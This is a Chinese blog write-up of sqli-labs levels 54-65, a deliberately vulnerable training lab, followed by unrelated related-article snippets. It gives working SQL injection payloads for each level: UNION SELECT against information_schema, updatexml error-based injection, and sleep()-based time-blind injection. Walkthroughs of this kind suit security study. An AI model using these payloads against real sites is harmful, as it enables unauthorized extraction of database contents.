sqli-libs(54-65关)
Less_54
Less-54:使用’’包裹
对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名
输入:?Id=1’ order by 3--+ 查看有多少列;
输入 ?id=-1' union select 1,2,3 --+ 查看回显位置;
输入 ?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+ 查看表名;
下面操作和less1基本一致。
Less_55
Less55: 使用()包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_56
Less56:使用('’)包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_57
Less57:使用””包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_58
Less58:使用’’包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
输入 ?id=-1' union select 1,2,3 --+ 并没有显示回显的位置;
所以我们不能使用union select联合查询,我们使用报错注入;
输入 ?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+ 查表名;
接下来步骤与less1基本一致。
Less_59
Less59:无包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
输入?id=-1 union select 1,2,3 --+ 依旧没有回显位置;
所以同58关相同,使用报错注入。
Less_60
Less60:使用(“”)包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
采用报错注入与第58关基本一致
Less_61
Less61:使用((‘’))包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
采用报错注入与第58关基本一致
Less_62
Less62:使用(‘’)包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注
输入 ?id=1') and if((length(database())=1),1,sleep(5))--+ 判断数据库的长度;
输入 ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 's' ,1, sleep(5)) --+ 判断数据库字母是否比s大;
less_63
Less63:使用‘’包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
less_64
Less64:使用(())包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
Less_65
Less65:使用(“”)包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
sqli-libs(54-65关)的更多相关文章
- 靶场练习-Sqli-labs通关记录(1-4关)
0x00 实验环境 本地:Win 10 靶场:sqli-labs(共65关,每日一关) 0x02 通关记录 简介:一天一关! (1)第一关: 简单的 ...
- R语言入门系列1--数学狗还是做数据好了
nanana,作为一个不合格的数学专业学生,脑袋不好使,又穷逼,只好学点儿实用的东西,希望能养活自己~~~ 不瞎哔哔,想做数据方面工作的时候在犹豫是学R还是学python,一点儿python基础都没有 ...
- JavaScript基础知识点
本书目录 第一章: JavaScript语言基础 第二章: JavaScript内置对象第三章: 窗口window对象第四章: 文档document对象第五章: 表单form对象第六章: ...
- MFS分布式文件系统
一.MFS概述: MooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目录树 ...
- Linux MFS分布式文件系统介绍和安装
MFS分布式文件系统 mooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目 ...
- 为什么hadoop中用到的序列化不是java的serilaziable接口去序列化而是使用Writable序列化框架
继上一个模块之后,此次分析的内容是来到了Hadoop IO相关的模块了,IO系统的模块可谓是一个比较大的模块,在Hadoop Common中的io,主要包括2个大的子模块构成,1个是以Writable ...
- 一次修改闭源 Entity Provider 程序集以兼容新 EntityFramework 的过程
读完本文你会知道,如何在没有源码的情况下,直接修改一个 DLL 以去除 DLL 上的强命名限制,并在该程序集上直接添加你的“友元程序集(一种特殊的 Attribute,将它应用在程序集上,使得程序集内 ...
- php中用GD绘制折线图
php中用GD绘制折线图,代码如下: Class Chart{ private $image; // 定义图像 private $title; // 定义标题 private $ydata; // 定 ...
- Python基础三. 函数、lambda、filter、map、reduce
一.概述 函数, 就是用一些语句组织起来实现一组特定的功能, 用来重复调用. 函数的作用及意义:最大化的重用代码和最小化的代码冗余以及对流程的分解. Python中有哪些函数: 内建的函数 第三方模块 ...
- 数组 Arrays类
1.数组是一组变量集合,用来存储相同数据类型的一组数据的连续的空间. *数组名(标识符)连续空间首地址. *元素下标标明元素在数组中的位置,从0开始. *每个元素都可以通过下标来访问. *数组长度固定 ...
随机推荐
- 【巨杉数据库SequoiaDB】企业级和开源领域“两开花”,巨杉引领国产数据库创新
2019年12月15日,OSC 源创会·年终盛典在深圳圆满举行.巨杉数据库作为业界领先的金融级分布式数据库厂商, 获得 “2019年开源数据库先锋企业” 及 “2019 GVP-Gitee最有价值开源 ...
- ubuntu19.04 redis启动和停止及连接
1.启动停止 如果以(sudo apt install redis-server)方式安装 启动: sudo srevice redis start 停止: sudo srevice redi ...
- 算法竞赛入门经典第二版 蛇形填数 P40
#include<bits/stdc++.h> using namespace std; #define maxn 20 int a[maxn][maxn]; int main(){ ; ...
- TODO:如何模拟cpu打满,磁盘打满,网卡打满
背景: 测试活动中,需要构造cpu打满.磁盘打满.网卡打满的场景 场景1:cpu打满 环境信息: 虚拟机,物理核数16个,每个物理核的虚拟核数1个,虚拟核数16个: [root@vm10-0-0-8 ...
- input设置为disabled,表单无法提交后台解决方法
<input name="country" id="country" size=12 value="disabled提交时得不到该值 " ...
- Spring Cloud介绍
Spring Cloud中国社区博客 Spring Cloud发展到2016年,国内关注的人越来越多,但是相应学习交流的平台和材料比较分散,不利于学习交流,因此Spring Cloud中国社区应运而生 ...
- 一键安装各个版本boost库(无需编译)
1.NuGet 最简单的,用VS自带的NuGet包管理器安装,一般比较常用的上面都有 2.下载exe安装包 在这里https://sourceforge.net/projects/boost/file ...
- WampServer 的安装\配置和使用
WampServer下载地址:http://www.wampserver.com/ WampServer安装(请按序号点击) 双击WampServer安装程序 步骤①更改路径 直接点击安装 等待安装不 ...
- 140. 单词拆分 II
Q: 给定一个非空字符串 s 和一个包含非空单词列表的字典 wordDict,在字符串中增加空格来构建一个句子,使得句子中所有的单词都在词典中.返回所有这些可能的句子. 说明: 分隔时可以重复使用字典 ...
- android 代码设置图标背景色(圆形图标)和图标颜色
原图: 1.改变图标颜色: mImageView.setColorFilter(Color.parseColor("#ff0000")); 效果: 2.改变图标背景色(主要是圆形图 ...